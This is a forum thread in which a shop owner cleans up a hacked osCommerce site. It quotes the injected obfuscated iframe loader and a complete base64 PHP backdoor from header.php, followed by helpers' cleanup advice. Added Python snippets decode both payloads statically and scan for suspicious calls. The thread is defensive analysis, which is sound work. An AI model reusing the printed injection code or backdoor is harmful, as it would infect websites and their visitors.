
Some strange Trojan virus.


13 replies to this topic

#1 Tsport

  • Community Member
  • 13 posts
  • Real Name:Alex

Posted 24 February 2011, 08:23

Hey everyone.
I got some strange problem: some Trojan virus can be detected when you first enter the web-site.
It shows sometimes that http://4684/and something here is loggened, and the virus threat pops up!
Here's my web: http://billing.iqxtech.com
Please tell me some advice how to remove it... or how to find it.

#2 germ

  • Community Member
  • 13,586 posts
  • Real Name:Jim
  • Gender:Male
  • Location:USA (GMT-6)

Posted 24 February 2011, 23:18

I don't see any malicious files, or scripts or iframes in the source.

Check the contents of the .htaccess in the root folder for redirects to other sites.
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Headers already sent" - The definitive help

"Cannot redeclare ..." - How to find/fix it

SSL Implementation Help


#3 DunWeb

  • Community Sponsor
  • 10,464 posts
  • Real Name:Chris Dunn
  • Gender:Male
  • Location:Tecumseh, Ontario, Canada N8N 1X8

Posted 25 February 2011, 03:00

Alex,

I agree with Jim. I did not really find any signs of hacker files and received no security messages while looking around your website.




Chris
:|: Was this post helpful ? Click the LIKE THIS button :|:

:|: Click Here to learn how I can help you with custom coding, add ons, security and templates :|:

:|: Need an Area Calculator, Pre-Paid Account, Virtual Pin, Auction or Layaway Add on ? Click Here :|:

#4 Tsport

  • Community Member
  • 13 posts
  • Real Name:Alex

Posted 06 March 2011, 15:23

I still got the same problem!!! Sometimes I get some strange Trojan security report!
When I just get in the index, in the source I found this:
[quote]
<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //-->[/quote]

and the Trojan comes from http://8931.in/dududu.js

I have tried to find this source code in all the pages: header.php, index.php, etc., and I found nothing!
And btw the four numbers always change; sometimes it can be like 5436.in/ and so on...
And when I get no Trojan reports, the source is without this code:


[quote]</script>
<form name="quick_find" action="http://billing.iqxtech.com/advanced_search_result.php" method="get"><input type="text" name="keywords" value="חיפוש מהיר..." id="txtSearch" size="15" onFocus="Clear(this)" autocomplete="off" maxlength="50" class=searchHeader>&nbsp;<input type="hidden" name="osCsid" value="f257a22ba87b3527fbac707b28c7140f">
<input type=image src=layout/images/search_btn.gif align="absmiddle" >

</form></div></div><br class="clearfloat" />
<div id="mainContent">

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="8931" height="1" width="1"><img src="about:blank" onError='njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju' style="width:300;height:300;border:0px;"><iframe id="rsaqr" src="about:blank"></iframe></div><!-- header_eof //-->

<!-- body //-->
[/quote]

Up to <div style="display: block; the source is in header.php.

Here's the site: http://iqxtech.com

Edited by Tsport, 06 March 2011, 15:24.
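An added example (not from any post in this thread) that works out what the injected handler quoted above does without running it: it rebuilds the iframe URL from the percent-escaped fragments, the hidden <img id="8931"> and the literal number, which is why the "four numbers" in the host change from hit to hit. The handler text is copied from the post; the function and variable names are mine.

```python
import re
from datetime import datetime, timezone
from urllib.parse import unquote

# The onError handler from the injected <div> quoted above (copied from the
# post). The first <img> never loads ("about:blank"), so onError fires and
# eval() builds a URL out of percent-escaped fragments, the id of the hidden
# <img id="8931"> and a literal number, then points the hidden iframe at it.
ONERROR = ('njjavmj=unescape("%27");jaeju=eval("document.getElementById("+njjavmj+"rsaqr"+njjavmj+").src=unescape("+njjavmj+"%68%74%74%70%3A%2F%2F"+njjavmj+")+document.getElementById("+njjavmj+"8931"+njjavmj+").id+unescape("+njjavmj+"%2E%69%6E%2F"+njjavmj+")+"+njjavmj+"1299430150"+njjavmj+"+unescape("+njjavmj+"%2E%70%68%70"+njjavmj+")");document.getElementById("rsaqr").src=jaeju')


def resolve_loader(handler: str) -> str:
    """Rebuild the iframe URL statically, without running any of the JavaScript."""
    # njjavmj = unescape("%27") is just a single quote, used to stitch the
    # eval() argument together; substituting it back recovers the statement.
    quote = unquote(re.search(r'njjavmj=unescape\("([^"]+)"\)', handler).group(1))
    stmt = re.search(r'eval\("(.*)"\);', handler).group(1).replace('"+njjavmj+"', quote)
    rhs = stmt.split(".src=", 1)[1]        # everything assigned to the iframe's src
    parts = []
    for term in rhs.split("+"):
        if m := re.fullmatch(r"unescape\('([^']*)'\)", term):
            parts.append(unquote(m.group(1)))          # %68%74%74%70... -> http://
        elif m := re.fullmatch(r"document\.getElementById\('([^']*)'\)\.id", term):
            parts.append(m.group(1))                   # the <img id="8931"> supplies the host label
        elif m := re.fullmatch(r"'([^']*)'", term):
            parts.append(m.group(1))                   # the literal 1299430150
        else:
            raise ValueError("unrecognised term: " + term)
    return "".join(parts)


def loader_date(url: str) -> str:
    """The file name in the URL is a Unix timestamp; show it as a UTC date."""
    secs = int(re.search(r"/(\d+)\.php$", url).group(1))
    return datetime.fromtimestamp(secs, timezone.utc).date().isoformat()


if __name__ == "__main__":
    url = resolve_loader(ONERROR)
    print(url, loader_date(url))   # http://8931.in/1299430150.php 2011-03-06
```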


#5 germ

  • Community Member
  • 13,586 posts
  • Real Name:Jim
  • Gender:Male
  • Location:USA (GMT-6)

Posted 06 March 2011, 15:35

Hack files currently in your images folder:

google033ca56fcb20d1b7.php
googlec6e11a4aebef71ed.php
googleeeae99914d1a2ad8.php

Hackers hide their code.

Look for code in your files that has these php keywords:

base64_decode or eval or gzinflate

#6 Tsport

  • Community Member
  • 13 posts
  • Real Name:Alex

Posted 06 March 2011, 15:46

How should I look for them in my PHP files? With what program?
Thank you!

#7 germ

  • Community Member
  • 13,586 posts
  • Real Name:Jim
  • Gender:Male
  • Location:USA (GMT-6)

Posted 06 March 2011, 15:58

I don't see anything like the code you posted in the page source when I access the site.

If you found it in the header then use a text editor and look in /includes/header.php

#8 Tsport

  • Community Member
  • 13 posts
  • Real Name:Alex

Posted 06 March 2011, 19:43

I have deleted the
google033ca56fcb20d1b7.php
googlec6e11a4aebef71ed.php
googleeeae99914d1a2ad8.php

in the image folder and the hack has gone :P Now I need to protect my folders.

#9 WhiteKnight

  • Community Member
  • 22 posts
  • Real Name:Walter
  • Gender:Male
  • Location:Florida, USA

Posted 06 March 2011, 20:56

Tsport, on 06 March 2011, 15:46, said:

How should I look for them in my PHP files? With what program?
Thank you!


If you use most web editing tools (like Dreamweaver) you will have a search or find function, and usually options on how it does that.

So you search or find for "base64_decode" (for example) and select entire site. Then you will get a list of files with that code in them.
In the case of this example it is usually at the top of every php file in the site and it is usually easier to upload a clean copy of your files than fix every file.
Search the forums or Google for how to fix your system to prevent specific things you find.

If you have a way to get a file count on your host (maybe 400 to several thousand files) you can check that, and when no users are on it should only change when you add something. If it changes without you adding something, then someone else added some file somewhere.
Sometimes you can find those by sorting by date/time on the host and seeing what the "new" file(s) are.

Of course do all the regular security measures detailed elsewhere on the forums, like file/dir permission, htaccess, etc.

Good luck.
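An added example (not from any post in this thread) that does both checks suggested above, Jim's keyword search and Walter's file-count and newest-files check, over a downloaded copy of the site. It builds its own small sample tree; the dropped file name is the one from the thread, its contents are made up, and all function names are mine.

```python
import os
import re
import tempfile
import time

# The PHP calls Jim names above. A hit is a lead to inspect by hand, not proof
# on its own: legitimate code uses these too, so read the matches in context.
SUSPICIOUS = re.compile(r"\b(base64_decode|eval|gzinflate)\s*\(")


def scan_source(text: str) -> list:
    """Return the sorted set of suspicious calls found in one file's text."""
    return sorted(set(SUSPICIOUS.findall(text)))


def scan_tree(root: str, newest: int = 5) -> dict:
    """Walk a downloaded copy of the site: flag files with suspicious calls,
    count the files and list the most recently modified ones (Walter's
    file-count and sort-by-date checks)."""
    hits, stamped = {}, []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as fh:
                found = scan_source(fh.read().decode("latin-1"))
            if found:
                hits[rel] = found
            stamped.append((os.path.getmtime(path), rel))
    stamped.sort(reverse=True)
    return {"count": len(stamped), "hits": hits,
            "newest": [rel for _, rel in stamped[:newest]]}


def demo() -> dict:
    """Constructed sample tree: a clean header plus a dropped google*.php in
    images/ (the file name is from the thread; the contents are made up)."""
    root = tempfile.mkdtemp()
    files = {
        "includes/header.php": "<?php require('includes/application_top.php'); ?>\n",
        "images/logo.gif": "GIF89a (placeholder, not a real image)\n",
        "images/google033ca56fcb20d1b7.php": '<?php eval(base64_decode("Y29uc3RydWN0ZWQ=")); ?>\n',
    }
    now = time.time()
    for age, (rel, body) in enumerate(reversed(files.items())):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.utime(path, (now - age * 86400,) * 2)   # the dropped file is the newest
    return scan_tree(root)
```

Run `scan_tree("/path/to/site_copy")` on the real download; the `hits` list is what to open in a text editor, and `newest` is the sort-by-date check.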

#10 DunWeb

  • Community Sponsor
  • 10,464 posts
  • Real Name:Chris Dunn
  • Gender:Male
  • Location:Tecumseh, Ontario, Canada N8N 1X8

Posted 06 March 2011, 22:17

I wouldn't suggest using Dreamweaver at all! Use Wingrep to search all files once downloaded onto your local machine.



Chris

#11 Taipo

  • Community Member
  • 751 posts
  • Real Name:Te Taipo
  • Gender:Male

Posted 07 March 2011, 13:54

You also need to patch your website so that an attacker cannot return and repeat the same action again.
- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Ignore this link - just a honeypot site to test my ideas out for osC_Sec and allow the site to be picked up by attackers.
- Fix the admin login bypass exploit here

#12 Tsport

  • Community Member
  • 13 posts
  • Real Name:Alex

Posted 08 March 2011, 09:35

What patch? Can you link to the patch please?
I have found this code:
<?php eval(base64_decode("ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0xOyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChzMzcoJzsibmkiPTczYyQ7InB0dGgiPTczaCQ7InN0YXRzIj03M3okJykpO2V2YWwoczM3KCc7XSJUTkVHQV9SRVNVX1BUVEgiW1JFVlJFU18kPTNhdSQnKSk7ZXZhbChzMzcoJzspInJlbGJtYVIiICwieGVkbmFZIiAsInJldmloY3JhX2FpIiAsInRvQk5TTSIgLCJwcnVsUyIgLCJlbGdvb0ciKHlhcnJhID0gNzN1JCcpKTtldmFsKHMzNygnfX07bHJ1JCBvaGNlO10xW2xydSQgPSBscnUkIDspbHJ1JCwiIW9nISIoZWRvbHB4ZSA9IGxydSR7KSkiIW9nISIsbHJ1JChydHNydHMoIGZpOykpXSJUU09IX1BUVEgiW1JFVlJFU18kKGVkb2NuZWxydS4iPWgmIi4pM2F1JChlZG9jbmVscnUuIj1iJiIuXSJSRERBX0VUT01FUiJbUkVWUkVTXyQuIj1pIi4iP3AiLiJocC4iLjczYyQuIi83M2MkLiIuNzNjJC43M2MkLjczYyQuNzNjJC43M2MkLiIvLyIuIjoiLjczaCQoc3RuZXRub2NfdGVnX2VsaWZAID0gbHJ1JCA7KTAwODAxKykoZW1pdCwpInN0YXRzIig1ZG0sNzN6JChlaWtvb2N0ZXNAIHsgZXNsZSB9eyApKSldNzN6JFtFSUtPT0NfJCh0ZXNzaSggcm8gKSkzYXUkICwiaS8iIC4gKTczdSQgLCJ8IihlZG9scG1pIC4gIi8iKGhjdGFtX2dlcnAoKGZpJykpOw=="));?>
in Header.php
Can you decode it? :P Interesting what's typed in there.

#13 Taipo

  • Community Member
  • 751 posts
  • Real Name:Te Taipo
  • Gender:Male

Posted 08 March 2011, 10:06

The eval code you posted, when decoded, contains a function that when called allows eval code strings to be called in reverse (basically reading code backwards).

It looks to me like it's a logging script that logs the site visitor's IP and downloads some code (probably a file with a virus in it) from a URL on a server at http:// ininininin.in/, as well as placing a cookie in your browser while bypassing any search engines that may view that page.

As for the patch link, there are quite a few posts in this forum with extensive lists of instructions of how to patch your site to clean up affected pages and patch the security holes so that attackers cannot further compromise your security. Most of them are in reference to this type of problem.

Edited by Taipo, 08 March 2011, 10:09.

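An added example (not from any post in this thread) of reading a payload like the one posted above without executing it: decode the base64 layer, then reverse each eval(s37('...')) argument, since s37() is the string-reversal helper Taipo describes. The sample is constructed in the same shape as the header.php payload and reproduces only its opening statements; `unwrap` and the other names are mine.

```python
import base64
import re

# Constructed sample in the same shape as the header.php payload posted above:
# eval(base64_decode(...)) wrapping a string-reversal helper s37() followed by
# eval(s37('...')) calls. The two reversed statements are the first ones the
# real payload runs; the rest of it is left out here.
INNER_PHP = (
    "function s37($s){for ($a = 0; $a <= strlen($s)-1; $a++ ){$e .= $s{strlen($s)-$a-1};}return($e);}"
    "eval(s37(';\"ni\"=73c$;\"ptth\"=73h$;\"stats\"=73z$'));"
    "eval(s37(';]\"TNEGA_RESU_PTTH\"[REVRES_$=3au$'));"
)
SAMPLE = '<?php eval(base64_decode("%s"));?>' % base64.b64encode(INNER_PHP.encode()).decode()


def unwrap(php: str) -> dict:
    """Peel the payload statically: decode the base64 layer, then reverse each
    eval(s37('...')) argument to read the statements. Nothing is executed."""
    m = re.search(r'base64_decode\("([A-Za-z0-9+/=]+)"\)', php)
    if not m:
        raise ValueError("no eval(base64_decode(...)) wrapper found")
    layer1 = base64.b64decode(m.group(1)).decode("latin-1")
    hidden = re.findall(r"eval\(s37\('(.*?)'\)\);", layer1)
    return {
        "reversal_helper": "function s37(" in layer1,
        "statements": [s[::-1] for s in hidden],   # s37() reverses, so reverse back
    }


if __name__ == "__main__":
    for stmt in unwrap(SAMPLE)["statements"]:
        print(stmt)
```

Pasting the blob from the post in place of `SAMPLE` gives the variable setup ($z37, $h37, $c37, $ua3) as plain text; anything that still looks encoded after one pass has another layer and gets the same treatment, never an eval.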

#14 Jeanne1971

  • Community Member
  • 7 posts
  • Real Name:Jeanne Wokurka

Posted 17 March 2011, 23:16

I've also got the "Trojan Virus" that keeps being blocked by Avast. So far, an item has been removed, only for it to return. Not sure what to do.

States: Trojan Horse
JS:IFrame-AU[Trj]


Please help. Any help would be SO appreciated. Thank you so much in advance.

Jeanne